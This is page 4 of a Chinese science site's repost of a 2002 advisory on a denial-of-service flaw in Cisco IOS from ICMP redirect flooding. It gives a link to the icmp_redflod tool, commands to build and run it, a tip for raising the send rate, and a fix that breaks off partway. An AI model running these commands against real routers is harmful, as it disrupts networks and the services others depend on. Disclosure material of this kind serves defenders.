相关文章  
  • 网络攻击的六大趋势
  • 关于一些路由协议的漏洞
  • Configuring GRE and IPSec with IPX Routing
  • 浅论网络防火墙技术
  • 关于思科安全方面的文章
  • 路由器安全漫谈
  • 网络服务器安全问题初探
  • 如何选择防火墙产品
  • 无线网络安全标准
  • 新疆移动安全大集中
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    Cisco IOS ICMP Redirect DoS4

    Cisco included.
      05/21/2002 Info from Cisco: Fix available shortly.
      
      Example:
      To generate random ICMP redirect messages, a sender tool is available at
      
      http://www.phenoelit.de/irpas/icmp_redflod.c, which has to be linked with
      the IRPAS packet library.
      
      linuxbox# cd /where/irpas/is
      linuxbox# make libpackets.a
      linuxbox# gcc -o icmp_redflod -I. -L. icmp_redflod.c -lpackets
      linuxbox# ./icmp_redflod -i eth0 -D -G
      
      On high bandwidth networks, the command line switch -w0 can be used to
      increase the sending rate.
      
      Solution:
      Filter inbound ICMP redirect messages or update your IOS to either a not
      vulnerable release or a fi

    页码:[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]4页、共10页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved